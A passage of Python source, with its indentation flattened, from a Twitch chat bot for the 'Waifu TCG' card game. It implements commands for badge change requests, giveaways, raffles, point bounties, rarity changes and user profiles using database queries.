cur.execute("UPDATE setbadge_requests SET state = 'cancelled', updated = %s WHERE setid = %s AND state = 'pending'", [current_milli_time(), args[1]])
if cur.rowcount > 0:
# send discord notif
cur.execute("SELECT name FROM sets WHERE id = %s", [args[1]])
setName = cur.fetchone()[0]
discordArgs = {"user": tags['display-name'], "id": args[1], "name": setName}
discordbody = {
"username": "WTCG Admin",
"content" : "{user} cancelled their badge change request for [{id}] {name}.".format(**discordArgs)
}
threading.Thread(target=sendAdminDiscordAlert, args=(discordbody,)).start()
self.message(channel, "You cancelled your badge change request for [%d] %s." % (args[1], setName), isWhisper)
else:
self.message(channel, "You didn't have a pending badge change request for that set.", isWhisper)
return
elif subcmd == "queue" and canManageImages:
with db.cursor() as cur:
cur.execute("SELECT setid FROM setbadge_requests WHERE state = 'pending' ORDER BY created ASC")
queue = cur.fetchall()
if len(queue) == 0:
self.message(channel, "The request queue is currently empty.", isWhisper)
else:
queueStr = ", ".join(str(item[0]) for item in queue)
self.message(channel, "Current requested IDs for set badge changes: %s. !setbadge check <id> to see each request." % queueStr, isWhisper)
return
elif canManageImages and subcmd in ["check", "accept", "reject"]:
if len(args) < 2:
self.message(channel, "Usage: !setbadge %s <set id>" % subcmd, isWhisper)
return
try:
setid = int(args[1])
except ValueError:
self.message(channel, "Usage: !setbadge %s <set id>" % subcmd, isWhisper)
return
with db.cursor() as cur:
cur.execute("SELECT sr.id, sr.image, users.id, users.name, sets.id, sets.name, sets.badgeid FROM setbadge_requests sr"
+ " JOIN sets ON sr.setid = sets.id"
+ " JOIN users ON sr.requesterid = users.id"
+ " WHERE sr.setid = %s AND sr.state = 'pending'", [setid])
request = cur.fetchone()
if request is None:
self.message(channel, "There is no pending request for that set.", isWhisper)
return
if subcmd == "check":
msgArgs = {"user": request[3], "setid": request[4], "name": request[5], "image": request[1]}
self.message(channel, ("{user} requested {name}'s set badge image to be changed to {image} ." +
" You can accept this request with !setbadge accept {setid}" +
" or deny it with !setbadge reject {setid} <reason>.").format(**msgArgs), isWhisper)
elif subcmd == "reject":
if len(args) < 3:
self.message(channel, "You must provide a reason to reject the request. If it is porn/illegal/etc, just ban the user.", isWhisper)
return
rejectionReason = " ".join(args[2:])
queryArgs = [tags['user-id'], current_milli_time(), rejectionReason, request[0]]
cur.execute("UPDATE setbadge_requests SET state = 'rejected', moderatorid = %s, updated = %s, rejection_reason = %s WHERE id = %s", queryArgs)
# notify them
self.message("#%s" % request[3], "Your badge change request for %s was rejected with the following reason: %s" % (request[5], rejectionReason), True)
self.message(channel, "Request rejected and user notified.", isWhisper)
else:
# update it
try:
hostedURL = processBadgeURL(request[1])
except Exception as ex:
self.message(channel, "Could not process image. %s. Check the URL yourself and if it is invalid reject their request." % str(ex), isWhisper)
return
cur.execute("UPDATE badges SET image = %s WHERE id = %s", [hostedURL, request[6]])
queryArgs = [tags['user-id'], current_milli_time(), request[0]]
cur.execute("UPDATE setbadge_requests SET state = 'accepted', moderatorid = %s, updated = %s WHERE id = %s", queryArgs)
# notify them
self.message("#%s" % request[3], "Your set badge change request for %s was accepted." % request[5], True)
self.message(channel, "Request accepted. The new set badge for %s is %s" % (request[5], hostedURL), isWhisper)
return
if command == "debug" and sender in superadmins:
if debugMode:
updateBoth("Hyperdimension Neptunia", "Testing title updates.")
self.message(channel, "Title and game updated for testing purposes")
else:
self.message(channel, "Debug mode is off. Debug command disabled.")
return
if command == "givefreepack" and sender in superadmins:
if len(args) < 2:
self.message(channel, "Usage: !givefreepack <username> <booster name> [<amount> (default 1)]", isWhisper)
return
if len(args) >= 3:
try:
amount = int(args[2])
except ValueError:
self.message(channel, "Invalid amount specified.", isWhisper)
return
else:
amount = 1
with db.cursor() as cur:
cur.execute("SELECT id, name FROM users WHERE name = %s", [args[0]])
userData = cur.fetchone()
if userData is None:
self.message(channel, "Invalid username specified.", isWhisper)
return
cur.execute("SELECT COUNT(*) FROM boosters WHERE name = %s", [args[1]])
if cur.fetchone()[0] == 0:
self.message(channel, "Invalid booster name specified.", isWhisper)
return
giveFreeBooster(userData[0], args[1], amount)
if amount > 1:
self.message('#%s' % userData[1], "You were given %d free %s packs by an admin. Check them using !freepacks" % (amount, args[1]), True)
else:
self.message('#%s' % userData[1], "You were given a free %s pack by an admin. Open it using !freepacks open %s" % (args[1], args[1]), True)
self.message(channel, "Successfully gave %d %s packs to %s." % (amount, args[1], userData[1]), isWhisper)
return
if command == "nepcord":
self.message(channel,
"To join the discussion in the official Waifu TCG Discord Channel, go to %s/discord" %
config["siteHost"], isWhisper=isWhisper)
return
if command == "giveaway":
if booleanConfig("marathonOnlyGiveaway") and not isMarathonChannel:
return
cur = db.cursor()
if len(args) == 0 or args[0].lower() == 'enter':
# check for a giveaway to enter
cur.execute("SELECT id, status FROM giveaways ORDER BY id DESC LIMIT 1")
giveaway_info = cur.fetchone()
if giveaway_info is None or giveaway_info[1] == 'closed':
self.message(channel, "There is not an open giveaway right now.", isWhisper)
cur.close()
return
# look for our own entry already existing
cur.execute("SELECT COUNT(*) FROM giveaway_entries WHERE giveawayid = %s AND userid = %s",
[giveaway_info[0], tags['user-id']])
entry_count = cur.fetchone()[0] or 0
if entry_count != 0:
self.message(channel,
"%s -> You have already entered the current giveaway." % tags["display-name"],
isWhisper)
cur.close()
return
# add an entry
cur.execute("INSERT INTO giveaway_entries (giveawayid, userid, timestamp) VALUES(%s, %s, %s)",
[giveaway_info[0], tags['user-id'], current_milli_time()])
self.message(channel,
"%s -> You have been entered into the current giveaway." % tags["display-name"],
isWhisper)
cur.close()
return
if sender not in superadmins:
return
subcmd = args[0].lower()
if subcmd == 'open':
cur.execute("SELECT id, status FROM giveaways ORDER BY id DESC LIMIT 1")
giveaway_info = cur.fetchone()
if giveaway_info is not None and giveaway_info[1] != 'closed':
self.message(channel, "There is already an open giveaway right now.", isWhisper)
cur.close()
return
# create a new giveaway
cur.execute("INSERT INTO giveaways (opened, creator, status) VALUES(%s, %s, 'open')",
[current_milli_time(), tags['user-id']])
self.message(channel, "Started a new giveaway!", isWhisper)
cur.close()
return
if subcmd == 'close':
cur.execute("SELECT id, status FROM giveaways ORDER BY id DESC LIMIT 1")
giveaway_info = cur.fetchone()
if giveaway_info is None or giveaway_info[1] == 'closed':
self.message(channel, "There is not an open giveaway right now.", isWhisper)
cur.close()
return
cur.execute("UPDATE giveaways SET closed = %s, status = 'closed' WHERE id = %s",
[current_milli_time(), giveaway_info[0]])
self.message(channel, "Closed entries for the current giveaway!", isWhisper)
cur.close()
return
if subcmd == 'pick':
cur.execute("SELECT id, status FROM giveaways ORDER BY id DESC LIMIT 1")
giveaway_info = cur.fetchone()
if giveaway_info is None:
self.message(channel, "There hasn't been a giveaway yet.", isWhisper)
cur.close()
return
if len(args) < 2:
self.message(channel, "Usage: !giveaway pick <amount of winners>", isWhisper)
cur.close()
return
try:
num_winners = int(args[1])
except Exception:
self.message(channel, "Usage: !giveaway pick <amount of winners>", isWhisper)
cur.close()
return
cur.execute(
"SELECT giveaway_entries.userid, users.name FROM giveaway_entries INNER JOIN users ON giveaway_entries.userid = users.id WHERE giveaway_entries.giveawayid = %s AND giveaway_entries.winner = 0 ORDER BY RAND() LIMIT " + str(
num_winners), [giveaway_info[0]])
winners = cur.fetchall()
if len(winners) != num_winners:
self.message(channel,
"There aren't enough entrants left to pick %d more winners! Try %d or fewer." % (
num_winners, len(winners)), isWhisper)
cur.close()
return
winner_ids = [row[0] for row in winners]
inTemplate = ",".join(["%s"] * len(winner_ids))
winner_names = ", ".join(row[1] for row in winners)
cur.execute(
"UPDATE giveaway_entries SET winner = 1, when_won = %s WHERE giveawayid = %s AND userid IN (" + inTemplate + ")",
[current_milli_time(), giveaway_info[0]] + winner_ids)
self.message(channel, "Picked %d winners for the giveaway: %s!" % (num_winners, winner_names),
isWhisper)
cur.close()
return
if command == "raffle":
with db.cursor() as cur:
cur.execute("SELECT id, status, ticket_price, max_tickets FROM raffles ORDER BY id DESC LIMIT 1")
raffle_info = cur.fetchone()
if len(args) == 0:
# check for info
if raffle_info is None or raffle_info[1] == 'done':
self.message(channel, "No raffle is open at this time.", isWhisper)
return
else:
cur.execute(
"SELECT num_tickets, num_winners, won_grand FROM raffle_tickets WHERE raffleid = %s AND userid = %s",
[raffle_info[0], tags['user-id']])
my_tickets = cur.fetchone()
if raffle_info[1] == 'open':
if my_tickets is None:
self.message(channel,
"There is a raffle currently open. You can buy up to %d tickets for %d points each using !raffle buy <amount>. You don't have any tickets right now." % (
raffle_info[3], raffle_info[2]), isWhisper)
elif my_tickets[0] < raffle_info[3]:
self.message(channel,
"There is a raffle currently open. You have bought %d tickets so far. You can buy up to %d more for %d points each using !raffle buy <amount>." % (
my_tickets[0], raffle_info[3] - my_tickets[0], raffle_info[2]),
isWhisper)
else:
self.message(channel,
"There is a raffle currently open. You are already at the limit of %d tickets." % (
raffle_info[3]), isWhisper)
else:
# raffle in process of drawing
if my_tickets is None:
self.message(channel,
"The current raffle is in the process of being drawn. Unfortunately, you didn't buy any tickets! Try again next raffle.")
else:
if my_tickets[2] != 0:
self.message(channel,
"The current raffle is in the process of being drawn. So far you have won %d minor prizes and a grand prize from your %d tickets!" % (
my_tickets[1] - 1, my_tickets[0]))
else:
self.message(channel,
"The current raffle is in the process of being drawn. So far, you have won %d minor prizes and no grand prize from your %d tickets." % (
my_tickets[1], my_tickets[0]))
return
subcmd = args[0].lower()
if subcmd == 'buy':
if raffle_info[1] != 'open':
self.message(channel,
"Raffle ticket purchases aren't open right now. Use !raffle to check the overall status.")
return
if len(args) < 2:
self.message(channel, "Usage: !raffle buy <amount>", isWhisper)
return
try:
tickets = int(args[1])
assert tickets >= 0
except Exception:
self.message(channel, "Invalid amount of tickets specified.", isWhisper)
return
cur.execute(
"SELECT num_tickets, num_winners, won_grand FROM raffle_tickets WHERE raffleid = %s AND userid = %s",
[raffle_info[0], tags['user-id']])
my_tickets = cur.fetchone()
can_buy = raffle_info[3] if my_tickets is None else raffle_info[3] - my_tickets[0]
cost = tickets * raffle_info[2]
if tickets > can_buy:
if can_buy == 0:
self.message(channel,
"%s, you're already at the maximum of %d tickets for this raffle. Please wait for the drawing." % (
tags['display-name'], raffle_info[3]), isWhisper)
else:
self.message(channel,
"%s, you can only buy %d more tickets for this raffle. Please adjust your purchase." % (
tags['display-name'], can_buy), isWhisper)
return
if not hasPoints(tags['user-id'], cost):
self.message(channel, "%s, you don't have the %d points required to buy %d tickets." % (
tags['display-name'], cost, tickets), isWhisper)
return
# okay, buy the tickets
addPoints(tags['user-id'], -cost)
if my_tickets is None:
cur.execute(
"INSERT INTO raffle_tickets (raffleid, userid, num_tickets, created) VALUES(%s, %s, %s, %s)",
[raffle_info[0], tags['user-id'], tickets, current_milli_time()])
else:
cur.execute(
"UPDATE raffle_tickets SET num_tickets = num_tickets + %s, updated = %s WHERE raffleid = %s AND userid = %s",
[tickets, current_milli_time(), raffle_info[0], tags['user-id']])
self.message(channel, "%s, you successfully bought %d raffle tickets for %d points." % (
tags['display-name'], tickets, cost), isWhisper)
return
if sender not in superadmins:
self.message(channel, "Usage: !raffle / !raffle buy <amount>", isWhisper)
return
if subcmd == 'open':
if raffle_info is not None and raffle_info[1] != 'done':
self.message(channel, "There is already an incomplete raffle right now.", isWhisper)
return
if len(args) < 3:
self.message(channel, "Usage: !raffle open <points per ticket> <max tickets>", isWhisper)
return
try:
points_per_ticket = int(args[1])
max_tickets = int(args[2])
assert max_tickets > 0 and max_tickets < 100
assert points_per_ticket >= 100
except Exception:
self.message(channel,
"Invalid arguments. Usage: !raffle open <points per ticket> <max tickets>",
isWhisper)
return
# create a new raffle
cur.execute(
"INSERT INTO raffles (opened, creator, status, ticket_price, max_tickets) VALUES(%s, %s, 'open', %s, %s)",
[current_milli_time(), tags['user-id'], points_per_ticket, max_tickets])
self.message(channel, "Started a new raffle!", isWhisper)
cur.close()
return
if subcmd == 'close':
if raffle_info is None or raffle_info[1] != 'open':
self.message(channel, "There is not an open raffle right now.", isWhisper)
return
cur.execute("UPDATE raffles SET closed = %s, status = 'drawing' WHERE id = %s",
[current_milli_time(), raffle_info[0]])
self.message(channel, "Closed ticket purchases for the current raffle!", isWhisper)
return
if subcmd == 'complete':
if raffle_info is None or raffle_info[1] != 'drawing':
self.message(channel, "There is not a raffle in the process of drawing right now.",
isWhisper)
return
cur.execute("UPDATE raffles SET status = 'done' WHERE id = %s",
[current_milli_time(), raffle_info[0]])
self.message(channel, "Closed drawing for the current raffle!", isWhisper)
return
if subcmd == 'pick' or subcmd == 'draw':
if raffle_info is None or raffle_info[1] != 'drawing':
self.message(channel, "There is not a raffle in the process of drawing right now.",
isWhisper)
return
if len(args) < 2:
self.message(channel, "Usage: !raffle pick <amount of winners>", isWhisper)
return
winners = []
try:
num_winners = int(args[1])
assert num_winners > 0
except Exception:
self.message(channel, "Usage: !raffle pick <amount of winners>", isWhisper)
return
for i in range(num_winners):
cur.execute(
"SELECT raffle_tickets.userid, users.name FROM raffle_tickets INNER JOIN users ON raffle_tickets.userid = users.id WHERE raffle_tickets.raffleid = %s AND raffle_tickets.num_winners < raffle_tickets.num_tickets ORDER BY -LOG(1-RAND())/(num_tickets - num_winners) LIMIT 1",
[raffle_info[0]])
winner = cur.fetchone()
if winner is None:
# completely out of non-winning tickets
break
# add their name to the winner list
winners.append(winner[1])
# update their ticket entry
cur.execute(
"UPDATE raffle_tickets SET num_winners = num_winners + 1, updated = %s WHERE raffleid = %s AND userid = %s",
[current_milli_time(), raffle_info[0], winner[0]])
if len(winners) == 0:
self.message(channel,
"Drew no new minor prize winners - the system is out of non-winning tickets!",
isWhisper)
elif len(winners) < num_winners:
self.message(channel, "Drew %d minor prize winners (truncated) - %s !" % (
len(winners), ", ".join(winners)), isWhisper)
else:
self.message(channel,
"Drew %d minor prize winners - %s !" % (len(winners), ", ".join(winners)),
isWhisper)
return
if subcmd == 'pickgrand' or subcmd == 'drawgrand':
if raffle_info is None or raffle_info[1] != 'drawing':
self.message(channel, "There is not a raffle in the process of drawing right now.",
isWhisper)
return
if len(args) >= 2:
self.message(channel, "!raffle drawgrand only draws one winner at once.", isWhisper)
return
cur.execute(
"SELECT raffle_tickets.userid, users.name FROM raffle_tickets INNER JOIN users ON raffle_tickets.userid = users.id WHERE raffle_tickets.raffleid = %s AND raffle_tickets.num_winners < raffle_tickets.num_tickets AND raffle_tickets.won_grand = 0 ORDER BY -LOG(1-RAND())/(num_tickets - num_winners) LIMIT 1",
[raffle_info[0]])
winner = cur.fetchone()
if winner is None:
# completely out of non-winning tickets
self.message(channel,
"Could not draw a new grand prize winner as there are no applicable users left!",
isWhisper)
return
# update their ticket entry
cur.execute(
"UPDATE raffle_tickets SET num_winners = num_winners + 1, won_grand = 1, updated = %s WHERE raffleid = %s AND userid = %s",
[current_milli_time(), raffle_info[0], winner[0]])
self.message(channel, "Drew a new grand prize winner: %s!" % winner[1])
return
if command == "bounty":
if len(args) == 0:
self.message(channel,
"Usage: !bounty <ID> <amount> / !bounty list / !bounty check <ID> / !bounty cancel <ID>",
isWhisper=isWhisper)
return
subcmd = args[0].lower()
# support !bounty ID amount to place an order
if subcmd not in ['check', 'place', 'add', 'list', 'cancel']:
args = ['place'] + args
subcmd = 'place'
if subcmd == "check":
if len(args) != 2:
self.message(channel, "Usage: !bounty check <ID>", isWhisper=isWhisper)
return
if infoCommandAvailable(tags['user-id'], sender, tags['display-name'], self, channel, isWhisper):
try:
waifu = getWaifuById(args[1])
assert waifu is not None
assert waifu['can_lookup'] == 1
if waifu['base_rarity'] >= int(config["numNormalRarities"]):
self.message(channel, "Bounties cannot be placed on special waifus.", isWhisper)
return
if sender not in superadmins:
useInfoCommand(tags['user-id'], sender, channel, isWhisper)
with db.cursor() as cur:
cur.execute(
"SELECT COUNT(*), COALESCE(MAX(amount), 0) FROM bounties WHERE waifuid = %s AND status='open'",
[waifu['id']])
allordersinfo = cur.fetchone()
if allordersinfo[0] == 0:
self.message(channel,
"[{id}] {name} has no bounties right now.".format(id=waifu['id'],
name=waifu['name']),
isWhisper)
return
cur.execute(
"SELECT amount FROM bounties WHERE userid = %s AND waifuid = %s AND status='open'",
[tags['user-id'], waifu['id']])
myorderinfo = cur.fetchone()
minfo = {"count": allordersinfo[0], "id": waifu['id'], "name": waifu['name'],
"highest": allordersinfo[1]}
if myorderinfo is not None:
minfo["mine"] = myorderinfo[0]
if myorderinfo[0] == allordersinfo[1]:
self.message(channel,
"There are currently {count} bounties for [{id}] {name}. You are the highest bidder at {highest} points.".format(
**minfo), isWhisper)
else:
self.message(channel,
"There are currently {count} bounties for [{id}] {name}. Your bid of {mine} points is lower than the highest bid of {highest} points.".format(
**minfo), isWhisper)
else:
self.message(channel,
"There are currently {count} bounties for [{id}] {name}. The highest bid is {highest} points. You don't have a bounty on this waifu right now.".format(
**minfo), isWhisper)
except Exception:
self.message(channel, "Invalid waifu ID.", isWhisper=isWhisper)
return
if subcmd == "list":
cur = db.cursor()
cur.execute(
"SELECT waifuid, amount, waifus.name FROM bounties JOIN waifus ON bounties.waifuid = waifus.id WHERE userid = %s AND status='open'",
[tags['user-id']])
buyorders = cur.fetchall()
cur.close()
if len(buyorders) == 0:
self.message(channel,
"%s, you don't have any bounties active right now!" % tags['display-name'],
isWhisper)
return
messages = ["%s, you have %d active bounties: " % (tags['display-name'], len(buyorders))]
for order in buyorders:
message = "[%d] %s for %d points; " % (order[0], order[2], order[1])
if len(message) + len(messages[-1]) > 400:
messages.append(message)
else:
messages[-1] += message
for message in messages:
self.message(channel, message, isWhisper)
return
if subcmd == "place" or subcmd == "add":
if len(args) < 3:
self.message(channel, "Usage: !bounty <ID> <amount>", isWhisper)
return
if not followsme(tags['user-id']):
self.message(channel,
"%s, you must follow the bot to use bounties so you can be sent a whisper if your order is filled." %
tags['display-name'], isWhisper)
return
try:
waifu = getWaifuById(args[1])
assert waifu is not None
assert waifu['can_lookup'] == 1
if waifu['base_rarity'] >= int(config["numNormalRarities"]):
self.message(channel, "Bounties cannot be placed on special waifus.", isWhisper)
return
amount = int(args[2])
# check for a current order
cur = db.cursor()
cur.execute(
"SELECT id, amount FROM bounties WHERE userid = %s AND waifuid = %s AND status='open'",
[tags['user-id'], waifu['id']])
myorderinfo = cur.fetchone()
if myorderinfo is not None and myorderinfo[1] == amount:
self.message(channel,
"%s, you already have a bounty in place for that waifu for that exact amount." %
tags['display-name'], isWhisper)
cur.close()
return
# check for affordability
old_bounty = 0 if myorderinfo is None else myorderinfo[1]
points_delta = amount if myorderinfo is None else amount - myorderinfo[1]
if points_delta > 0 and not hasPoints(tags['user-id'], points_delta):
if myorderinfo is None:
self.message(channel,
"%s, you don't have enough points to place a bounty with that amount." %
tags['display-name'], isWhisper)
else:
self.message(channel,
"%s, you don't have enough points to increase your bounty to that amount." %
tags['display-name'], isWhisper)
cur.close()
return
# check for hand space
if myorderinfo is None and currentCards(tags['user-id']) >= handLimit(tags['user-id']):
self.message(channel, "%s, you don't have a free hand space to make a new bounty!" % tags[
'display-name'], isWhisper)
cur.close()
return
# check the range
cur.execute(
"SELECT COALESCE(MAX(amount), 0) FROM bounties WHERE userid != %s AND waifuid = %s AND status = 'open'",
[tags['user-id'], waifu['id']])
highest_other_bid = cur.fetchone()[0]
de_value = int(config["rarity%dValue" % waifu['base_rarity']])
min_amount = int(config["rarity%dMinBounty" % waifu['base_rarity']])
rarity_cap = int(config["rarity%dMaxBounty" % waifu['base_rarity']])
max_amount = max(rarity_cap, highest_other_bid * 6 // 5)
if amount < min_amount or amount > max_amount:
self.message(channel,
"%s, your bounty for this waifu must fall between %d and %d points." % (
tags['display-name'], min_amount, max_amount), isWhisper)
cur.close()
return
# outbidding?
outbidding = highest_other_bid != 0 and amount > highest_other_bid and old_bounty < highest_other_bid
minimum_outbid = max(highest_other_bid // 20, 5)
if outbidding:
if amount < highest_other_bid + minimum_outbid:
self.message(channel,
"%s, you must place a bounty of at least %d points to outbid the current highest bid of %d points." % (
tags['display-name'], highest_other_bid + minimum_outbid,
highest_other_bid), isWhisper)
cur.close()
return
elif amount < old_bounty and highest_other_bid + minimum_outbid > amount and amount > highest_other_bid:
self.message(channel,
"%s, the lowest you can reduce your bounty to is %d points due to the bid of %d points below it." % (
tags['display-name'], highest_other_bid + minimum_outbid,
highest_other_bid))
cur.close()
return
# check for duplicate amount
cur.execute(
"SELECT COUNT(*) FROM bounties WHERE waifuid = %s AND status = 'open' AND amount = %s",
[waifu['id'], amount])
dupe_amt = cur.fetchone()[0]
if dupe_amt > 0:
self.message(channel,
"%s, someone else has already placed a bounty on that waifu for %d points. Choose another amount." % (
tags['display-name'], amount), isWhisper)
cur.close()
return
# actions that require confirmation first
if len(args) < 4 or args[3].lower() != 'yes':
# check for placing a bounty that has already been outbid
if highest_other_bid > amount:
msgargs = (tags['display-name'], highest_other_bid, waifu['id'], amount)
if myorderinfo is None:
self.message(channel,
'%s, are you sure you want to place a bounty for lower than the current highest bid (%d points)? Enter "!bounty %d %d yes" if you are sure.' % msgargs,
isWhisper)
else:
self.message(channel,
'%s, are you sure you want to change your bounty to a lower amount than the current other highest bid (%d points)? Enter "!bounty %d %d yes" if you are sure.' % msgargs,
isWhisper)
cur.close()
return
# check for placing a bounty above regular cap
if amount > rarity_cap:
amount_refund = (amount - rarity_cap) // 2 + rarity_cap
msgargs = (tags['display-name'], amount_refund, waifu['id'], amount)
self.message(channel,
'%s, are you sure you want to place a bounty above the normal cap for that waifu\'s rarity? If you cancel it, you will only receive %d points back unless a higher bounty than yours is filled. Enter "!bounty %d %d yes" if you are sure.' % msgargs,
isWhisper)
cur.close()
return
# if it passed all of those checks it should be good to go.
# penalize them for reducing a bounty above regular cap?
if points_delta < 0 and old_bounty > rarity_cap:
change_above_cap = min(-points_delta, old_bounty - rarity_cap)
addPoints(tags['user-id'], change_above_cap // 2 + (-points_delta - change_above_cap))
else:
addPoints(tags['user-id'], -points_delta)
if myorderinfo is None:
cur.execute(
"INSERT INTO bounties (userid, waifuid, amount, status, created) VALUES(%s, %s, %s, 'open', %s)",
[tags['user-id'], waifu['id'], amount, current_milli_time()])
self.message(channel, "%s, you placed a new bounty on [%d] %s for %d points." % (
tags['display-name'], waifu['id'], waifu['name'], amount), isWhisper)
else:
cur.execute("UPDATE bounties SET amount = %s, updated = %s WHERE id = %s",
[amount, current_milli_time(), myorderinfo[0]])
self.message(channel, "%s, you updated your bounty on [%d] %s to %d points." % (
tags['display-name'], waifu['id'], waifu['name'], amount), isWhisper)
# outbid message?
if outbidding:
# attempt to whisper for outbid
cur.execute(
"SELECT users.name FROM bounties JOIN users ON bounties.userid=users.id WHERE bounties.waifuid = %s AND bounties.amount = %s AND bounties.status = 'open' LIMIT 1",
[waifu['id'], highest_other_bid])
other_bidder = cur.fetchone()
if other_bidder is not None:
self.message('#%s' % other_bidder[0],
"Your bounty on [%d] %s has been outbid. The new highest bounty is %d points." % (
waifu['id'], waifu['name'], amount), True)
cur.close()
return
except Exception as exc:
self.message(channel, "Usage: !bounty <ID> <amount>", isWhisper=isWhisper)
return
if subcmd == "cancel":
if len(args) != 2:
self.message(channel, "Usage: !bounty cancel <ID>", isWhisper=isWhisper)
return
try:
waifu = getWaifuById(args[1])
assert waifu is not None
assert waifu['can_lookup'] == 1
# check for a current order
cur = db.cursor()
cur.execute(
"SELECT id, amount, created, updated FROM bounties WHERE userid = %s AND waifuid = %s AND status='open'",
[tags['user-id'], waifu['id']])
myorderinfo = cur.fetchone()
bounty_time = myorderinfo[3] if myorderinfo[3] is not None else myorderinfo[2]
if myorderinfo is not None:
cur.execute("UPDATE bounties SET status = 'cancelled', updated = %s WHERE id = %s",
[current_milli_time(), myorderinfo[0]])
# penalise them?
rarity_cap = int(config["rarity%dMaxBounty" % waifu['base_rarity']])
# free cancel after direct outbid was met?
cur.execute(
"SELECT COUNT(*) FROM bounties WHERE waifuid = %s AND status='filled' AND updated > %s",
[waifu['id'], bounty_time])
free_cancel = cur.fetchone()[0] > 0
if myorderinfo[1] > rarity_cap and not free_cancel:
refund = (myorderinfo[1] - rarity_cap) // 2 + rarity_cap
addPoints(tags['user-id'], refund)
self.message(channel,
"%s, you cancelled your bounty for [%d] %s and received only %d points back since it was above cap." % (
tags['display-name'], waifu['id'], waifu['name'], refund), isWhisper)
else:
addPoints(tags['user-id'], myorderinfo[1])
self.message(channel,
"%s, you cancelled your bounty for [%d] %s and received your %d points back." % (
tags['display-name'], waifu['id'], waifu['name'], myorderinfo[1]),
isWhisper)
else:
self.message(channel,
"%s, you don't have an active bounty for that waifu!" % tags['display-name'],
isWhisper)
cur.close()
return
except Exception:
self.message(channel, "Usage: !bounty cancel <ID>", isWhisper=isWhisper)
return
if command == "raritychange" and sender in superadmins:
hasConfirmed = False
if len(args) > 0 and args[-1].lower() == "yes":
hasConfirmed = True
args = args[:-1]
if len(args) < 2:
self.message(channel, "Usage: !raritychange <ID> <rarity>", isWhisper)
return
try:
waifu = getWaifuById(args[0])
assert waifu is not None
rarity = parseRarity(args[1])
except Exception:
self.message(channel, "Usage: !raritychange <ID> <rarity>", isWhisper)
return
if waifu['base_rarity'] == int(config['numNormalRarities']):
self.message(channel, "You shouldn't be changing a special waifu into another rarity.", isWhisper)
return
if rarity == waifu['base_rarity']:
self.message(channel, "[%d] %s is already %s base rarity!" % (
waifu['id'], waifu['name'], config['rarity%dName' % rarity]), isWhisper)
return
if not hasConfirmed and rarity > waifu['base_rarity'] and waifu['base_rarity'] < int(config["numNormalRarities"]) - 1:
# check for promoted copies existing
with db.cursor() as cur:
cur.execute("SELECT COUNT(*) FROM cards WHERE waifuid = %s AND rarity BETWEEN %s AND %s", [waifu['id'], waifu['base_rarity'] + 1, int(config["numNormalRarities"]) - 1])
if cur.fetchone()[0] > 0:
self.message(channel, "WARNING: You are trying to increase the rarity of a card which people have already promoted. This may cause undesirable results. Append ' yes' to your command if you want to do this anyway.", isWhisper)
return
# okay, do it
with db.cursor() as cur:
if rarity < int(config['numNormalRarities']):
cur.execute("UPDATE waifus SET normal_weighting = LEAST(GREATEST(normal_weighting, (SELECT MIN(w1.normal_weighting) FROM (SELECT * FROM waifus) w1 WHERE w1.base_rarity = %s)), (SELECT MAX(w2.normal_weighting) FROM (SELECT * FROM waifus) w2 WHERE w2.base_rarity = %s)), base_rarity = %s WHERE id = %s", [rarity, rarity, rarity, waifu['id']])
else:
cur.execute("UPDATE waifus SET base_rarity = %s WHERE id = %s", [rarity, waifu['id']])
cur.execute("SELECT id, userid, boosterid FROM cards WHERE userid IS NOT NULL AND waifuid = %s AND rarity < %s", [waifu['id'], rarity])
for copy in cur.fetchall():
if rarity >= int(config['numNormalRarities']):
updateCard(copy[0], {"rarity": rarity})
else:
updateCard(copy[0], {"userid": None, "boosterid": None})
addCard(copy[1], waifu['id'], 'other', copy[2], rarity)
attemptPromotions(waifu['id'])
# cancel all bounties
cur.execute(
"SELECT bounties.userid, users.name, bounties.amount FROM bounties JOIN users ON bounties.userid = users.id WHERE bounties.waifuid = %s AND bounties.status = 'open'",
[waifu['id']])
bounties = cur.fetchall()
for bounty in bounties:
addPoints(bounty[0], bounty[2])
self.message('#%s' % bounty[1],
"Your bounty for [%d] %s has been cancelled due to its rarity changing. Your %d points have been refunded." % (
waifu['id'], waifu['name'], bounty[2]), True)
cur.execute(
"UPDATE bounties SET status='cancelled', updated=%s WHERE waifuid = %s AND status='open'",
[current_milli_time(), waifu['id']])
if rarity >= int(config["numNormalRarities"]):
cur.execute("UPDATE users SET favourite = 1 WHERE favourite = %s AND (SELECT COUNT(*) FROM cards WHERE cards.userid = users.id AND cards.boosterid IS NULL AND cards.waifuid = %s) = 0", [waifu['id']] * 2)
# done
self.message(channel, "Successfully changed [%d] %s's base rarity to %s." % (
waifu['id'], waifu['name'], config['rarity%dName' % rarity]), isWhisper)
return
if command == "profile":
if len(args) == 0:
self.message(channel, tags["display-name"] + ", your profile: " + config[
"siteHost"] + "/profile?user=" + str(sender), isWhisper)
return
elif args[0] == "favourite" or args[0] == "favorite":
newFav = 0
try:
newFav = int(args[1])
except ValueError:
self.message(channel, args[1] + " is not a number. Please try again.")
return
newFavW = getWaifuById(newFav)
if newFavW is None:
self.message(channel, "That Waifu doesn't exist! Try again!", isWhisper)
return
canLookup = newFavW["can_lookup"] == 1
hasOrIsLowRarity = False
if int(newFavW["base_rarity"]) > 7:
logger.debug(sender + " requested to set " + str(
newFav) + " as his new Favourite Waifu, which is promo or above. Checking if they have it...")
hand = getHand(tags["user-id"])
for w in hand:
if str(w["waifuid"]) == str(newFav):
hasOrIsLowRarity = True
break
else:
hasOrIsLowRarity = True
if not canLookup and not hasOrIsLowRarity:
self.message(channel, tags[
"display-name"] + ", sorry, but that Waifu doesn't exist. Try a different one!",
isWhisper)
return
elif newFavW["can_favourite"] == 0:
self.message(channel, "%s, sorry, but that Waifu can't be set as your favourite. Try a different one!" % tags['display-name'], isWhisper)
return
elif hasOrIsLowRarity:
self.message(channel, "Updated your favourite Waifu to be " + newFavW["name"] + "! naroDesu",
isWhisper)
setFavourite(tags["user-id"], newFav)
return
else:
self.message(channel, tags[
"display-name"] + ", sorry, but this Waifu is a Special or above, so you need to have it to set it as a favourite!",
isWhisper)
return
elif args[0] == "description":
newDesc = " ".join(args[1:])
logger.debug("New description: " + newDesc)
if len(newDesc) > 1023:
self.message(channel, "That description is too long. Please limit it to 1024 characters.",
isWhisper)
return
setDescription(tags["user-id"], newDesc)
self.message(channel, tags["display-name"] + ", successfully updated your profile description!",
isWhisper)
if command == "fixwaifu":
self.message(channel,
"To submit changes/fixes for any waifu, please go to %s/fixes" % config["siteHost"],
isWhisper)
return
if command == "packspending":
packstats = getPackStats(tags["user-id"])
if len(packstats) == 0:
self.message(channel,
